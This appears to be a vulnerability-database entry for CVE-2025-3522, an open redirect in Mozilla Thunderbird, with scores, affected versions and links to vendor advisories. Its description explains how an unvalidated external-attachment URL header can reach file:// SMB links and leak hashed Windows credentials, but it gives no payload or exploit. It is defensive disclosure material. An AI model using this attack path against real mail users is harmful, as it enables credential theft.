CVE-2025-3522Open Redirect in Mozilla Thunderbird

CWE-601Open RedirectCWE-1220Insufficient Granularity of Access Control9 documents8 sources
Severity
6.3MEDIUMNVD
EPSS
0.2%
top 54.11%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
1
Mozilla Thunderbird
Timeline
PublishedApr 15
Latest updateJul 22

Description

Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally. When an email is opened, Thunderbird accesses the specified URL to determine file size, and navigates to it when the user clicks the attachment. Because the URL is not validated or sanitized, it can reference internal resources like chrome:// or SMB share file:// links, potentially leading to hashed Windows credential leakage and opening the door to more serious security issue

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:LExploitability: 2.8 | Impact: 3.4

Affected Packages2 packages

NVDmozilla/thunderbird129.0137.0.2+1
Debianmozilla/thunderbird< 1:128.10.1esr-1~deb11u1+3

🔴Vulnerability Details

3
GHSA
GHSA-78fw-w53r-pgwg: Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally2025-04-15
CVEList
Leak of hashed Window credentials via crafted attachment URL2025-04-15
OSV
CVE-2025-3522: Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally2025-04-15

📋Vendor Advisories

5
Ubuntu
Thunderbird vulnerabilities2025-07-22
Red Hat
thunderbird: Leak of hashed Window credentials via crafted attachment URL2025-04-15
Debian
CVE-2025-3522: thunderbird - Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle att...2025
Mozilla
Mozilla Foundation Security Advisory 2025-26: CVE-2025-3522
Mozilla
Mozilla Foundation Security Advisory 2025-27: CVE-2025-3522
CVE-2025-3522 — Open Redirect in Mozilla Thunderbird | cvebase